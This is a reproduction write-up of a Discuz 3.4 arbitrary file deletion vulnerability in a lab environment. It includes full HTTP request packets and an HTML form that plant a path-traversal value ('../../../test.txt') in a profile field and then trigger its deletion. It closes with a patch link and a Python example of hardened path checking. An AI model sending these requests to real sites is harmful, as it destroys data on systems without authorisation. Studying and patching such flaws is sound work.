Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability. A similar vulnerability had been submitted to wooyun and to Discuz officially back in 2014, but the incomplete fix led to this one. Many sources online say the official 3.4 version has already been fixed, but the environment I used is the 3.4 version from vulhub, so, not knowing whether 3.4 is fixed or not, I just reproduce it directly.
Affected versions: Discuz <= 3.4
Environment:
Reproduction process: First create a test.txt file in the discuz directory; it will be the file deleted later.
Create test.txt
Visit http://192.168.220.131/home.php?mod=spacecp, then open Inspect Element, look up the value of formhash and copy it.
View formhash
Capture the request with Burp and obtain the cookie.
Capture cookie
Send the following packet, changing the cookie, the formhash and the file to be deleted:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
Send the deletion packet
Refresh the page and look at the birthplace field; it will be shown in the state in the figure below:
Data successfully written
This shows that the data has made it into the database:
Then create an upload.html with the following code; change the ip in it to the discuz domain name and [form-hash] to your formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the packet directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (you can write anything here)
-----------------------------123821742118716--
Go back into discuz and check: the test.txt file has been deleted.
Fix suggestion: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the code related to unlink.
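The root cause of the behaviour reproduced above, shown as an added illustration that is neither Discuz's own code nor the linked patch: a profile field value chosen by the user is stored in the database and later handed to an unlink() call without any check on where the path points. The Python below (Discuz itself is PHP; the language is chosen so the example can be run directly) puts that flawed pattern next to a hardened deletion routine that accepts only a bare file name and verifies that the resolved path still lies inside the upload directory. The directory layout data/attachment/profile, the function names and the sample files are assumptions made for the demo, not Discuz's real layout.

```python
"""Added example (not Discuz code): contrast an unchecked unlink() of a
user-controlled stored value with a deletion routine confined to the upload
directory. The directory layout and file names below are assumptions."""
import os
import tempfile
from pathlib import Path

# Hypothetical upload directory, relative to the site root (three levels deep,
# so a stored value of ../../../test.txt climbs back up to the site root).
UPLOAD_DIR_NAME = os.path.join("data", "attachment", "profile")


def delete_profile_file_vulnerable(site_root, stored_value):
    """Flawed pattern: the stored field value, which the user wrote through the
    profile form, is joined onto the upload directory and unlinked as-is."""
    target = os.path.join(site_root, UPLOAD_DIR_NAME, stored_value)
    if os.path.isfile(target):
        os.unlink(target)
        return True
    return False


def resolve_upload_path(site_root, stored_value):
    """Return the absolute path of stored_value inside the upload directory,
    or None if the value is not a plain file name or escapes that directory."""
    upload_dir = os.path.realpath(os.path.join(site_root, UPLOAD_DIR_NAME))
    # A profile image reference should be a bare file name: any directory
    # separator, '..' component or absolute path is rejected outright.
    name = os.path.basename(stored_value)
    if name != stored_value or name in ("", ".", ".."):
        return None
    candidate = os.path.realpath(os.path.join(upload_dir, name))
    # Second, independent check: even after symlink resolution the target
    # must still sit under the upload directory.
    if os.path.commonpath([upload_dir, candidate]) != upload_dir:
        return None
    return candidate


def delete_profile_file_hardened(site_root, stored_value):
    """Delete only files that resolve inside the upload directory."""
    target = resolve_upload_path(site_root, stored_value)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo():
    """Build a throwaway site tree (constructed data) and run both variants
    against a traversal value of the same shape as in the writeup."""
    root = tempfile.mkdtemp()
    upload_dir = os.path.join(root, UPLOAD_DIR_NAME)
    os.makedirs(upload_dir)
    outside = Path(root, "test.txt")  # file outside the upload directory
    outside.write_text("keep me")
    Path(upload_dir, "avatar.jpg").write_text("jpg bytes")  # legitimate upload
    traversal = "../../../test.txt"

    results = {}
    results["hardened_rejects_traversal"] = not delete_profile_file_hardened(root, traversal)
    results["outside_file_survives"] = outside.is_file()
    results["hardened_deletes_own_upload"] = delete_profile_file_hardened(root, "avatar.jpg")
    results["vulnerable_deletes_outside"] = delete_profile_file_vulnerable(root, traversal)
    results["outside_file_gone"] = not outside.is_file()
    return results


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The two checks in resolve_upload_path are deliberately redundant: the basename comparison rejects the stored value at the input-validation layer, and the realpath/commonpath comparison catches anything that still escapes (for example through a symlink planted inside the upload directory). Either one alone would have stopped the ../../../test.txt value; together they also cover the case the 2014 fix missed, where the value is written at one request and consumed by a different one.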